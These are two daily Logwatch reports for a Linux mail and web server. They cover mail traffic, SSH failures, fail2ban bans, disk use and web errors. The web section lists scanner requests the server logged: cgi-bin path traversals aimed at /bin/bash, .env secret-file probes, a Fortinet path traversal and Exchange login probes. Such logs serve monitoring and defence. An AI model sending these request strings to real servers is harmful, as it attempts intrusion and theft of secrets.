28 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Illegal address syntax in SMTP command
4 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Dec 11 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-10 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 23:23 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
89.248.165.52 -> 85.206.160.115:80: 1 Time(s)
89.248.165.52 -> hotmail-com.olc.protection.outlook.com:25: 1 Time(s)
A total of 11 sites probed the server
Requests with error response codes
400 Bad Request
null: 17 Time(s)
/: 4 Time(s)
mstshash=Domain: 4 Time(s)
/favicon.ico: 3 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/iRf;: 1 Time(s)
85.206.160.115:80: 1 Time(s)
\xB33\x86\xB3\x1A\x07\xC5\x0B\x03Wz\x0E>\x ... x09\xC0\x13\xC0: 1 Time(s)
hotmail-com.olc.protection.outlook.com:25: 1 Time(s)
http://5.188.210.227/echo.php: 1 Time(s)
mstshash=Administr: 1 Time(s)
499 (undefined)
/fonts/SourceSansPro-Regular.woff: 2 Time(s)
/apple-touch-icon.png: 1 Time(s)
/build/af7ae505a9eed503f8b8e6982036873e.woff2: 1 Time(s)
/build/cover-styles-pack.fef3ca2736298be630a4.css: 1 Time(s)
/build/emojify.js/dist/css/basic/emojify.min.css: 1 Time(s)
/favicon.png: 1 Time(s)
/fonts/SourceCodePro-Medium.woff: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... lling&t=NscO4zz: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
/.env: 5 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/favicon.ico: 2 Time(s)
/robots.txt: 2 Time(s)
///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/console/: 1 Time(s)
/ecp/GP.js: 1 Time(s)
/owa/auth.owa: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 126 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
9.868K Bytes accepted 10,105
9.868K Bytes sent via SMTP 10,105
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
70 Connections
11 Connections lost (inbound)
70 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months